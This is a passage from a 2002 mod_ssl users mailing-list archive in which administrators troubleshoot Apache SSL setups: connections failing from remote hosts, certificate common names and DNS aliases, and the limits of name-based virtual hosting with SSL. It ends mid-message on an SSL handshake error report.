by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA09746; Thu, 28 Feb 2002 19:42:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bulk.resource.org id TAA09678; Thu, 28 Feb 2002 19:41:47 +0100 (MET) Received: from bulk.resource.org (localhost.resource.org [127.0.0.1]) by bulk.resource.org (8.12.2/8.12.2) with ESMTP id g1SIfe7Z016022 for ; Thu, 28 Feb 2002 10:41:40 -0800 (PST) Received: (from bburdick@localhost) by bulk.resource.org (8.12.2/8.12.2/Submit) id g1SIfecF016021 for modssl-users@modssl.org; Thu, 28 Feb 2002 10:41:40 -0800 (PST) From: Brad Burdick Message-Id: <200202281841.g1SIfecF016021@bulk.resource.org> Subject: Re: Re: SSL works from localhost but not elsewhere In-Reply-To: <200202281819.NAA18583@www23.ureach.com> To: modssl-users@modssl.org Date: Thu, 28 Feb 2002 10:41:40 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL94 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Brad Burdick X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > how would I use openssl and curl ? to check > port 443 from a nonlocal host ? also, i don't recall from previous mail, but could you 'telnet yourhost 443' from the nonlocal host? good to know connectivity is working before debugging at a higher level. -brad -- Brad Burdick | bburdick@media.org http://media.org/ | The medium is NOT the message ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 20:11:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA12713; Thu, 28 Feb 2002 20:10:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA12687; Thu, 28 Feb 2002 20:09:58 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 98E154CE581; Thu, 28 Feb 2002 20:09:56 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1SIf4936411; Thu, 28 Feb 2002 19:41:04 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spiff.wake.tec.nc.us id QAA19543; Thu, 28 Feb 2002 16:23:11 +0100 (MET) Received: from mail.wake.tec.nc.us (loopback [127.0.0.1]) by spiff.wake.tec.nc.us (AIX4.3/8.9.3/8.9.3) with ESMTP id KAA28022 for ; Thu, 28 Feb 2002 10:23:57 -0500 Message-ID: <3C7E4B8C.E292B6C7@mail.wake.tec.nc.us> Date: Thu, 28 Feb 2002 10:23:56 -0500 From: Dale Weaver X-Mailer: Mozilla 4.61i [en] (X11; U; AIX 4.3) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: DNS aliases & modssl Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Dale Weaver X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have got modssl 2.8.26 compiled in Apache 1.3.23. It works fine on my workstation where I built it to test, however I have not put it on my production webserver. My web server has a fully qualified DN that is pretty long but I have another domain that is short. How does modssl determine which DN it is running under when it compares it to the cert? Is it DNS, httpd.conf, URL accessed, hostname, etc.? If someone accesses my site under the www.very.very.long.domain via https and my cert is built for www.short.dom and the server name in httpd.conf is www.very.very.long.domain, will it still work? They are both the same in DNS. Dual entries for the address and not just an alias. Just a little confused about how modssl handles multiple domain names for the same server given that the certs are domain specific. Any clarification is appreciated. Dale --------------------------------------------------------------------- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 20:36:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA16018; Thu, 28 Feb 2002 20:35:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from nsk.yi.org id UAA15795; Thu, 28 Feb 2002 20:33:22 +0100 (MET) Received: (from strange@localhost) by nsk.yi.org (8.11.6/8.11.6) id g1SJXOe23905 for modssl-users@modssl.org; Thu, 28 Feb 2002 19:33:24 GMT Date: Thu, 28 Feb 2002 19:33:24 +0000 From: Luciano Miguel Ferreira Rocha To: modssl-users@modssl.org Subject: Re: DNS aliases & modssl Message-ID: <20020228193324.A23773@nsk.yi.org> References: <3C7E4B8C.E292B6C7@mail.wake.tec.nc.us> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3C7E4B8C.E292B6C7@mail.wake.tec.nc.us>; from dale@mail.wake.tec.nc.us on Thu, Feb 28, 2002 at 10:23:56AM -0500 X-Disclaimer: 'Author of this message is not responsible for any harm done to reader's computer.' X-Organization: 'NSK' X-Section: 'Admin' X-Priority: '1 (Highest)' Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Luciano Miguel Ferreira Rocha X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Feb 28, 2002 at 10:23:56AM -0500, Dale Weaver wrote: > pretty long but I have another domain that is short. How does modssl > determine which DN it is running > under when it compares it to the cert? Is it DNS, httpd.conf, URL > accessed, hostname, etc.? AFAIK modssl does *not* compare the cert with the DN. Only the browser does that. And if both DN point to the same IP address, how can modssl, or any server, know what DN the client used? modssl returns the cert as specified in httpd.conf, under a VirtualHost section. And that respective VirtualHost can only be calculated by the destination IP address (the one the client's is connecting to). So, you'll either need to use different IP addresses for each DN, or, in your non-ssl site and https urls, point to just one address. Regards, Luciano Rocha -- Luciano Rocha, strange@nsk.yi.org The trouble with computers is that they do what you tell them, not what you want. -- D. Cohen ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 22:08:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA24634; Thu, 28 Feb 2002 22:07:51 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spiff.wake.tec.nc.us id WAA24530; Thu, 28 Feb 2002 22:06:47 +0100 (MET) Received: from localhost (dale@localhost) by spiff.wake.tec.nc.us (AIX4.3/8.9.3/8.9.3) with ESMTP id QAA21604; Thu, 28 Feb 2002 16:06:56 -0500 Date: Thu, 28 Feb 2002 16:06:56 -0500 (EST) From: Dale Weaver X-Sender: dale@spiff To: Luciano Miguel Ferreira Rocha cc: modssl-users@modssl.org Subject: Re: DNS aliases & modssl In-Reply-To: <20020228193324.A23773@nsk.yi.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Dale Weaver X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users OK. I think I get it. Looks like the simple solution would be to get a CA cert for the short domain and provide links to the SSL portion to make sure it is accessed via the proper URL and limit access in the SSL section of the site to only accept from that referring page. Thanks. --------------------------------------------------------------------- Dale Weaver dale@mail.wake.tec.nc.us On Thu, 28 Feb 2002, Luciano Miguel Ferreira Rocha wrote: > On Thu, Feb 28, 2002 at 10:23:56AM -0500, Dale Weaver wrote: > > pretty long but I have another domain that is short. How does modssl > > determine which DN it is running > > under when it compares it to the cert? Is it DNS, httpd.conf, URL > > accessed, hostname, etc.? > > AFAIK modssl does *not* compare the cert with the DN. Only the browser does > that. > > And if both DN point to the same IP address, how can modssl, or any server, > know what DN the client used? > > modssl returns the cert as specified in httpd.conf, under a VirtualHost > section. And that respective VirtualHost can only be calculated by the > destination IP address (the one the client's is connecting to). > > So, you'll either need to use different IP addresses for each DN, or, > in your non-ssl site and https urls, point to just one address. > > Regards, > Luciano Rocha > > -- > Luciano Rocha, strange@nsk.yi.org > > The trouble with computers is that they do what you tell them, not what > you want. > -- D. Cohen > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 22:59:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA00247; Thu, 28 Feb 2002 22:58:53 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from microanswers.net id WAA00114; Thu, 28 Feb 2002 22:57:45 +0100 (MET) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by microanswers.net (8.11.0/8.11.0) with SMTP id g1SMRLT14611 for ; Thu, 28 Feb 2002 16:27:21 -0600 Message-ID: <037101c1c0a2$d6cd53a0$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <200202281818.NAA18197@www23.ureach.com> Subject: SSL works from localhost but not elsewhere Date: Thu, 28 Feb 2002 15:56:55 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear Eric and list, RE:>>I doubt it is the firewall since the I am trying to access https://192.168.0.80/ from another PC on the same LAN, i.e. router does not come into play. ----------------- I only mention the firewall issue because if you have one, it could be the culprit. I just spent the better part of two days phutzing with my firewall to allow two new services and the problem was the firewall. I have an internal LAN as well. Test by flushing all ipchains rules and enabling all policies to ACCEPT packets. If it works, you've got your answer. I am suspect of your NameVirtualHost and Virtual Host settings. I would spend some time studying the VirtualHost doc pages at the http://www.apache.org web site and see if that doesn't give you some options. Just got through setting mod_ssl up myself last night so the process still fresh in my memory. Two days from now, I may not be so quick to offer suggestions. I did, however, set my secure server up on a different IP address/machine than the DNS/web server. i.e. the main pages are on one server and the secure server is a different machine. ------------- RE:>>and in both cases no log entries are made on the server in either access_log or ssl_request log. ---- If you are using RedHat, you might check >/var/log/messages<. This could be where you get some clues as to whether it is a firewall issue. I think this file structure is fairly standard across *nix's and it provided major help for why my new services were not allowing access to the server. Good Luck! Andrew Lietzow The ACL Group, Inc. At any given moment, on a continuum between dunce and genius. Hope you're catching me on a good day. :-) ----- Original Message ----- From: "Eric Webber" To: "Andrew Lietzow" ; Sent: Thursday, February 28, 2002 12:18 PM Subject: Re: Re: SSL works from localhost but not elsewhere > thanks for the reply. > > I doubt it is the firewall since > the I am trying to access https://192.168.0.80/ > from another PC on the same LAN, i.e. router > does not come into play. > > That IP address is an internal IP address to the > LAN. So for example my webserver with mod_ssl > running is on IP 192.168.0.80, and the PC I am > trying to access it with is 192.168.0.3 for > example. > > When I use a web browser on 192.168.0.80 with > URL https://localhost/ or the URL > https://192.168.0.80/ SSL works fine with > corresponding log entries in both access_log > and ssl_request log being made. > > But when I use browser on 192.168.0.3 with > URL https://192.168.0.80/ it responds with > Page Cannot be Displayed with Explorer, and > connection refused with Netscape and in > both cases no log entries are made on the > server in either access_log or ssl_request log. > > > Of course I checked if normal http works from > 192.168.0.3 and it does of course. > > > I am at a loss as to why this is. > > warmest regards, > > Eric Sean Webber > > > > > > > > ________________________________________________ > Get your own "800" number > Voicemail, fax, email, and a lot more > http://www.ureach.com/reg/tag > > > ---- On Thu, 28 Feb 2002, Andrew Lietzow (andrewl@theaclgroup.com) > wrote: > > > Dear Owen, > > Personally I am not a big fan of opening attachments from unknown > > sources. > > Since you're on this list, you're > > probably a trusted source but I was not aware that sending > attachments > > through this list server was even an option. Perhaps I am a bit > > paranoid > > about viruses? > > > > With that said, here are a series of things that I would check. > > 1) Do you have a firewall that might be preventing HTTPS access? > > 2) Do other non-secure pages from that server come up in your > > browser-wowser? > > 3) In httpd.conf, do you have any entries similar to the following: > > > > NameVirtualHost $IPADDR > > > > > > ServerAdmin webmaster@$YOURDOMAINNAME > > ServerName $YOURDOMAINNAME > > Port 443 > > DocumentRoot /var/www/secure.yourdomain.name > > (or whereever you store your documents that you want to > bring up > > on > > the secure server. You need to have something in that directory > that > > you > > can bring up if you don't have index.html) > > ErrorLog logs/$YOURDOMAINNAME_err > > TransferLog logs/$YOURDOMAINNAME_transfer > > > > > > If you have the ErrorLog file, what is it telling you? Any hints > there? > > > > Also, in your named.domain.xxx file, do you have an entry for your > > secure > > server if it is running on a different server than your main web > site? > > > > Probably this info is more than you need, and I am a newbie, but > better > > more > > than not enough :-) > > > > Good luck! > > > > Andrew Lietzow > > The ACL Group, Inc. > > > > > > > > > > > > sure that your firewall is allowing HTTP and HTTPS access? > > ----- Original Message ----- > > From: "Eric Webber" > > To: > > Sent: Wednesday, February 27, 2002 2:16 PM > > Subject: SSL works from localhost but not elsewhere > > > > > > > > > > > > > When I go to the url https://localhost > > > using netscape on the same box running > > > apache and mod_ssl, SSL appears to > > > work fine. > > > > > > But when I come in from a box other than > > > the box running apache and mod_ssl, I get > > > Page cannot be displayed. > > > > > > I have apache 1.3.20 RedHat, OpenSSL > > > version 0.9.6b, on redhat version 2.4.7-10. > > > > > > Is this because of the Servername ? I am at > > > a loss and cannot find the solution in the > > > mod_ssl documentation. Is there a set of > > > tests to help ferret out this problem ? > > > > > > warmest regards, > > > > > > > > > Eric Sean Webber > > > > > > > > > here is a copy of my httpd.conf as a file > > > attachment > > > > > > > > > > > > > > > ________________________________________________ > > > Get your own "800" number > > > Voicemail, fax, email, and a lot more > > > http://www.ureach.com/reg/tag > > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > > User Support Mailing List > modssl-users@modssl.org > > Automated List Manager > majordomo@modssl.org > > > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 04:36:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA06813; Fri, 1 Mar 2002 04:35:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.family.net.nz id EAA06551; Fri, 1 Mar 2002 04:33:28 +0100 (MET) Received: from xtra.co.nz (port226.adsl2.watchdog.net.nz [210.55.20.226]) by mail.family.net.nz (8.11.2/8.11.2) with ESMTP id g211o1U16999 for ; Fri, 1 Mar 2002 14:50:01 +1300 Message-ID: <3C7EDEB9.4060809@xtra.co.nz> Date: Fri, 01 Mar 2002 14:51:53 +1300 From: David User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.4) Gecko/20011019 Netscape6/6.2 (CK-PCUser) X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Virtual hosts and ssl. Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, Could someone clarify this point for me please. When compiling a .crs the following message is displayed which implies I don't have to use a FQND Common Name (eg, your name or your server's hostname) []: But from the ssl-faq it says Make sure you enter the FQDN ("Fully Qualified Domain Name") of the server when OpenSSL prompts you for the "CommonName" I have several virtual users hosted on the same apache server and want to be able to provide ssl for them. Do I have to use a FQDN and therefore need an individual certificate for Virtual user or can I have one certificate in the name of the hosting organization that will provide ssl for all the hosted users? Thanks. -David. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 07:34:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA26222; Fri, 1 Mar 2002 07:33:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop5.sttl.uswest.net id HAA25929; Fri, 1 Mar 2002 07:31:11 +0100 (MET) Received: (qmail 9893 invoked by alias); 1 Mar 2002 06:31:09 -0000 Delivered-To: fixup-modssl-users@modssl.org@fixme Received: (qmail 9880 invoked by uid 0); 1 Mar 2002 06:31:09 -0000 Received: from sttldslgw34poolb4.sttl.uswest.net (HELO wmtiabertj) (65.102.185.4) by sttlpop5.sttl.uswest.net with SMTP; 1 Mar 2002 06:31:09 -0000 From: "SoilentG" To: Subject: RE: Virtual hosts and ssl. Date: Thu, 28 Feb 2002 22:34:13 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal In-Reply-To: <3C7EDEB9.4060809@xtra.co.nz> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "SoilentG" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users What is required for SSL and Virtual Hosts is that you use IP based virutal hosts. Name based VH's don't work on SSL. So if you have only 1 public IP then you'll only be able to have 1 SSL enabled host. 5 = 5 and so on. g'luck Jeff > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of David > Sent: Thursday, February 28, 2002 5:52 PM > To: modssl-users@modssl.org > Subject: Virtual hosts and ssl. > > > Hello, > > Could someone clarify this point for me please. > > When compiling a .crs the following message is displayed which implies I > don't have to use a FQND > > Common Name (eg, your name or your server's hostname) []: > > But from the ssl-faq it says > > Make sure you enter the FQDN ("Fully Qualified Domain Name") of the > server when OpenSSL prompts you for the "CommonName" > > > I have several virtual users hosted on the same apache server and want > to be able to provide ssl for them. Do I have to use a FQDN and > therefore need an individual certificate for Virtual user or can I have > one certificate in the name of the hosting organization that will > provide ssl for all the hosted users? > > Thanks. > > -David. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 09:22:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA08337; Fri, 1 Mar 2002 09:21:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from work.fantomas.sk id JAA08127; Fri, 1 Mar 2002 09:19:24 +0100 (MET) Received: (from uhlar@localhost) by work.fantomas.sk (8.9.3/8.9.3/Debian 8.9.3-21) id JAA22271 for modssl-users@modssl.org; Fri, 1 Mar 2002 09:19:21 +0100 Date: Fri, 1 Mar 2002 09:19:20 +0100 From: "Matus \"fantomas\" Uhlar" To: modssl-users@modssl.org Subject: Re: Virtual hosts and ssl. Message-ID: <20020301091920.A22244@fantomas.sk> Mail-Followup-To: modssl-users@modssl.org References: <3C7EDEB9.4060809@xtra.co.nz> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from soilentg@kovclan.org on Thu, Feb 28, 2002 at 10:34:13PM -0800 X-Echelon: nuclear bomb plane crash terrorist attack djihad spy echelon sucks Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Matus \"fantomas\" Uhlar" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -> What is required for SSL and Virtual Hosts is that you use IP based -> virutal hosts. Name based VH's don't work on SSL. So if you have -> only 1 public IP then you'll only be able to have 1 SSL enabled -> host. 5 = 5 and so on. well, they _do_ work - but only with one certificate. you cannot use more certificates on one IP. -- Matus "fantomas" Uhlar, uhlar@fantomas.sk ; http://www.fantomas.sk/ Warning: I don't wish to receive spam to this address. Varovanie: Nezelam si na tuto adresu dostavat akukolvek reklamnu postu. Due to unexpected conditions Windows 2000 will be released in first quarter of year 1901 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 09:22:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA08411; Fri, 1 Mar 2002 09:21:51 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta-2.gci.net id JAA08194; Fri, 1 Mar 2002 09:19:57 +0100 (MET) Received: from mmp-1.gci.net ([208.138.130.80]) by mta-2.gci.net (Netscape Messaging Server 4.15) with ESMTP id GSACGW01.8BU for ; Thu, 28 Feb 2002 23:19:44 -0900 Received: from OMystic1 ([24.237.9.79]) by mmp-1.gci.net (Netscape Messaging Server 4.15) with ESMTP id GSACGV03.690 for ; Thu, 28 Feb 2002 23:19:43 -0900 From: "Mark Weisman" To: Subject: RE: Virtual hosts and ssl. Date: Thu, 28 Feb 2002 23:16:25 -0900 Message-ID: <000801c1c0f9$64af3c00$4f09ed18@OMystic1> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Mark Weisman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Working a little here with Apache couldn't you just make another VS entry in Apache for the new port, all using a singular IP addr? Example; -- -- ServerAdmin webmaster@whatever.com -- DocumentRoot /www/domain1 -- ServerName www.whatever.com -- ErrorLog wherever -- CustomLog wherever part two -- -- -- ServerAdmin sameguy or gal -- DocumentRoot /www/ssl -- ServerName www.whatever.com -- ErrorLog wherever -- CustomLog wherever part two -- By allowing Apache to do the internal routing, wouldn't that re-direct where he's talking about. I'm also doing a lot of virtual hosting, and currently I use a singular domain name for all SSL requests I was thinking about trying the above out and see if it worked? But since we're on the topic. Thank you, Mark-Nathaniel Weisman MCP, CNA, A+, MOUS MI Network Systems Administrator Career Academy MIS Department Anchorage, AK -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of SoilentG Sent: Thursday, February 28, 2002 9:34 PM To: modssl-users@modssl.org Subject: RE: Virtual hosts and ssl. What is required for SSL and Virtual Hosts is that you use IP based virutal hosts. Name based VH's don't work on SSL. So if you have only 1 public IP then you'll only be able to have 1 SSL enabled host. 5 = 5 and so on. g'luck Jeff > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of David > Sent: Thursday, February 28, 2002 5:52 PM > To: modssl-users@modssl.org > Subject: Virtual hosts and ssl. > > > Hello, > > Could someone clarify this point for me please. > > When compiling a .crs the following message is displayed which implies > I > don't have to use a FQND > > Common Name (eg, your name or your server's hostname) []: > > But from the ssl-faq it says > > Make sure you enter the FQDN ("Fully Qualified Domain Name") of the > server when OpenSSL prompts you for the "CommonName" > > > I have several virtual users hosted on the same apache server and want > to be able to provide ssl for them. Do I have to use a FQDN and > therefore need an individual certificate for Virtual user or can I have > one certificate in the name of the hosting organization that will > provide ssl for all the hosted users? > > Thanks. > > -David. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 09:48:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA11893; Fri, 1 Mar 2002 09:47:45 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA11758; Fri, 1 Mar 2002 09:46:44 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA12420 for ; Fri, 1 Mar 2002 09:46:36 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma012402; Fri, 1 Mar 02 09:46:33 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA09822 for ; Fri, 1 Mar 2002 09:46:33 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA17649 for ; Fri, 1 Mar 2002 09:46:33 +0100 (MET) Message-ID: <3C7F3FE8.66591602@bourse.ch> Date: Fri, 01 Mar 2002 09:46:32 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Virtual hosts and ssl. References: <000801c1c0f9$64af3c00$4f09ed18@OMystic1> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Mark Weisman wrote: > > Working a little here with Apache couldn't you just make another VS > entry in Apache for the new port, all using a singular IP addr? > Example; > -- > -- ServerAdmin webmaster@whatever.com > -- DocumentRoot /www/domain1 > -- ServerName www.whatever.com > -- ErrorLog wherever > -- CustomLog wherever part two > -- > -- > -- ServerAdmin sameguy or gal > -- DocumentRoot /www/ssl > -- ServerName www.whatever.com > -- ErrorLog wherever > -- CustomLog wherever part two > -- > > By allowing Apache to do the internal routing, wouldn't that re-direct > where he's talking about. I'm also doing a lot of virtual hosting, and > currently I use a singular domain name for all SSL requests I was > thinking about trying the above out and see if it worked? But since > we're on the topic. What you have above is perfect. This is port-based virtula-hosting and there is no problem with it. The problem arises if you try name-based VHing with SSL - that won't work: http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47 http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2 Rgds, owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 12:01:48 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA26735; Fri, 1 Mar 2002 12:00:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA26693; Fri, 1 Mar 2002 12:00:11 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 17B684CE6E0; Fri, 1 Mar 2002 12:00:07 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g21AxcA56540; Fri, 1 Mar 2002 11:59:38 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mel-rto6.wanadoo.fr id JAA07115; Fri, 1 Mar 2002 09:09:11 +0100 (MET) Received: from mel-rta9.wanadoo.fr (193.252.19.69) by mel-rto6.wanadoo.fr; 1 Mar 2002 08:48:59 +0100 Received: from lv4-26.com (193.253.221.67) by mel-rta9.wanadoo.fr; 1 Mar 2002 08:48:41 +0100 Received: from progstation01 [192.168.0.103] by lv4-26.com (FTGate 2, 2, 4, 1); Fri, 01 Mar 2002 08:48:26 +0100 Message-ID: <000801c1c0f5$7ba81ca0$6700a8c0@progstation01> From: "MARTIN Pierre" To: Subject: I need help please! Date: Fri, 1 Mar 2002 08:48:31 +0100 Organization: HicksCorp MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01C1C0FD.DD541AA0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "MARTIN Pierre" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users C'est un message de format MIME en plusieurs parties. ------=_NextPart_000_0005_01C1C0FD.DD541AA0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, im using an apache server with mod_ssl. (the last one, newest one = version...) I get the error 724:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown = protocol:D:\MyPro jects\Applications\opensa\openssl\ssl\s23_clnt.c:460: When i'm trying to connect. I can only read this with the openssl = s_client mode, because the broser just search forever when i type the = secured domain name. Notice that the number of the error is 